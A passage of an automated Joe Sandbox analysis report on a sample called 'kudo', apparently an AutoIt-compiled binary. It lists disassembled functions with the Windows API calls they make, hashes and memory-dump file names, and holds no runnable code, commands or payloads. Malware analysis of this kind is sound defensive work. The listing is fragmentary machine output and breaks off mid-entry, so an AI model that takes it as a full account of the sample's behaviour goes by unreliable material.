                                                      • Opcode ID: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                      • Instruction ID: f75672802f09a817490aa4cc54c1d10cc760e10365e92d84573ad9ee26e4e74e
                                                      • Opcode Fuzzy Hash: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                      • Instruction Fuzzy Hash: 12114871510608BFDB218FA8DC409AEB7BCFF14740F104469F905E7250D6729E40A760
                                                      Function 0086955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                      • _free.LIBCMT ref: 008696A2
                                                      • _free.LIBCMT ref: 008696A9
                                                      • _free.LIBCMT ref: 00869714
                                                        • Part of subcall function 00822D55: HeapFree.KERNEL32(00000000,00000000), ref: 00822D69
                                                        • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                      • _free.LIBCMT ref: 0086971C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: dc3722f5eff0e81c698cf7f9501b00b84511826997b887124672bf27af1010f7
                                                      • Instruction ID: 67706956afbd6358d3d43c670b221cf8614eda5fc495c227767f6dd3a3fe2fd5
                                                      • Opcode Fuzzy Hash: dc3722f5eff0e81c698cf7f9501b00b84511826997b887124672bf27af1010f7
                                                      • Instruction Fuzzy Hash: 1D514CB1904219AFDF249F68DC81A9EBBB9FF48300F10449EF249E3281DB715A90CF59
                                                      Function 0082470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                                                      • Instruction ID: 1416a75f5b83d65f4dedffecb7718a5220573ef89e456647f67f205a76741e28
                                                      • Opcode Fuzzy Hash: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                                                      • Instruction Fuzzy Hash: 9A41D374B1076A9FDB18CF69E8809AE7BA5FF45364B24913DE825C7640DB70DDC08B60
                                                      Function 00807285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0083EA39
                                                      • 75B0A2D5.COMDLG32(?), ref: 0083EA83
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                        • Part of subcall function 00820791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,008072BD,00000001,008C6290,?,00803BBB,008C52F8,008C52E0,?,?), ref: 008207B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: NamePath$FullLong_memset
                                                      • String ID: X
                                                      • API String ID: 3051022977-3081909835
                                                      • Opcode ID: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                      • Instruction ID: 824ec198d9ffe63a07345697d29176dee1f30d15f1b63435fe5a0f03686f0f08
                                                      • Opcode Fuzzy Hash: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                      • Instruction Fuzzy Hash: F2216F71A102589BDB419B98DC45AEE7BF8FF49714F004059E508E7281DBB459898FA2
                                                      Function 00868D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                      • Instruction ID: b7b6c646c0e9c3387c970457b1c2a459f0e4598795a2b0351ca22ad9840865e9
                                                      • Opcode Fuzzy Hash: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                      • Instruction Fuzzy Hash: B501F971804228BEDB18CAA8D816EFE7BFCEB11301F00419AF556D2281E874E6048B60
                                                      Function 00820DB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      • std::exception::exception.LIBCMT ref: 00820DEC
                                                      • __CxxThrowException@8.LIBCMT ref: 00820E01
                                                        • Part of subcall function 0082859B: RaiseException.KERNEL32(?,?,00000000,008B9E78,?,00000001,?,?,?,00820E06,00000000,008B9E78,00809E8C,00000001), ref: 008285F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID: bad allocation
                                                      • API String ID: 3902256705-2104205924
                                                      • Opcode ID: 55d689632686b2609276c240349772dd4aaa68d849c6ef7bec23ca203e8958cd
                                                      • Instruction ID: 4136f12895760623cf0f01088c66b8fe1d4f6e2d473f14b9b6170a6083cb2ddd
                                                      • Opcode Fuzzy Hash: 55d689632686b2609276c240349772dd4aaa68d849c6ef7bec23ca203e8958cd
                                                      • Instruction Fuzzy Hash: 2CF0813550222DA6CF10BAA8FC159DEBBA8FF01351F144566F904E6282DFB09AC49AD6
                                                      Function 00A3E0D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00A3E11D
                                                      • ExitProcess.KERNEL32(00000000), ref: 00A3E13C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$CreateExit
                                                      • String ID: D
                                                      • API String ID: 126409537-2746444292
                                                      • Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                      • Instruction ID: 48588a90e17248cac70f20230e9389ee552f603f72ba4ca16a131003080e5bb3
                                                      • Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                      • Instruction Fuzzy Hash: 3BF0EC7594024CABDB60EFE0CD49FEE77BCBF08701F508518FA0A9A180DA7896088B61
                                                      Function 008698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 008698F8
                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0086990F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                      • Instruction ID: f79048711561f1d86fa26ff34e76647ccc4d5830344642d522e377396cc4bb52
                                                      • Opcode Fuzzy Hash: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                      • Instruction Fuzzy Hash: B8D05E7958030DABDB509BA4DC0EFDA7B3CF704700F0002B1BB54D11A2EAB095988B91
                                                      Function 0087CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d5f02163afd50e0609aac767d0b6b34776031a511e39f6155be861c0d6f26b0
                                                      • Instruction ID: 23ecbf04916ae2cf029c940b67f598817c80a2d922d04ea000e7108e1fd9be25
                                                      • Opcode Fuzzy Hash: 4d5f02163afd50e0609aac767d0b6b34776031a511e39f6155be861c0d6f26b0
                                                      • Instruction Fuzzy Hash: E2F118716083059FCB14DF28C884A6ABBE5FF89314F54892EF899DB252D770E945CF82
                                                      Function 0080F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                        • Part of subcall function 008160F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00816154
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0080F9CD
                                                      • OleInitialize.OLE32(00000000), ref: 0080FA4A
                                                      • CloseHandle.KERNEL32(00000000), ref: 008445C8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                      • String ID:
                                                      • API String ID: 3094916012-0
                                                      • Opcode ID: 8ac90df0cc99369460a598582e48f622148595ba7cd3bd00cbad43040f42fe79
                                                      • Instruction ID: 72107a528fdccd4d6ae7c1363c95f94eaf3c7b68ff5069eb62fc3370455dabad
                                                      • Opcode Fuzzy Hash: 8ac90df0cc99369460a598582e48f622148595ba7cd3bd00cbad43040f42fe79
                                                      • Instruction Fuzzy Hash: 8D81ACF0905A808ECF88DF79A845E197BF5FBA9306790812AD119CB372EB7464C58F19
                                                      Function 0080434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00804370
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00804432
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 64a1e64ab8dd83d7b845e48a7dbffdc9e7c58d1ab39029628c8f83f540056aa2
                                                      • Instruction ID: 1b39e270ce9322e0d454ff22941ebd7f2c68809bb675220b37fd14ad72546eb9
                                                      • Opcode Fuzzy Hash: 64a1e64ab8dd83d7b845e48a7dbffdc9e7c58d1ab39029628c8f83f540056aa2
                                                      • Instruction Fuzzy Hash: F43193B05057018FD760DF24DC84A9BBBF8FB58308F00192EE69AC2291D771B984CB96
                                                      Function 0082571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A192
                                                        • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A19C
                                                      • __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082A1C8: GetModuleFileNameW.KERNEL32(00000000,008C33BA,00000104,00000000,00000001,00000000), ref: 0082A25A
                                                        • Part of subcall function 0082A1C8: ___crtMessageBoxW.LIBCMT ref: 0082A308
                                                        • Part of subcall function 0082309F: ___crtCorExitProcess.LIBCMT ref: 008230A5
                                                        • Part of subcall function 0082309F: ExitProcess.KERNEL32 ref: 008230AE
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                      • Instruction ID: 53330f4711c5cca4d9bf97f6a87d80ab13efcd13b663173200103200e6dd1274
                                                      • Opcode Fuzzy Hash: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                      • Instruction Fuzzy Hash: A901DE352C0B31DEEA11273CBC96A2A7398FF82772F50042AF905DA282DE7089C14662
                                                      Function 008698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 008698BB
                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00869548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008698D1
                                                      • CloseHandle.KERNEL32(00000000), ref: 008698D8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                      • Instruction ID: 216812fa413d0cffc01ad6bbd29fd0471697dbd72c11e9d021c0289312593fc7
                                                      • Opcode Fuzzy Hash: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                      • Instruction Fuzzy Hash: 5EE08632140214B7D7222B58EC0DFDA7B19FB06760F104120FB54A90E187B115219798
                                                      Function 00868D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00868D1B
                                                        • Part of subcall function 00822D55: HeapFree.KERNEL32(00000000,00000000), ref: 00822D69
                                                        • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                      • _free.LIBCMT ref: 00868D2C
                                                      • _free.LIBCMT ref: 00868D3E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                      • Instruction ID: 9ab6a39feaf037924826457b79e233bf944a6a16dc623bb22b59b69be66e2b0c
                                                      • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
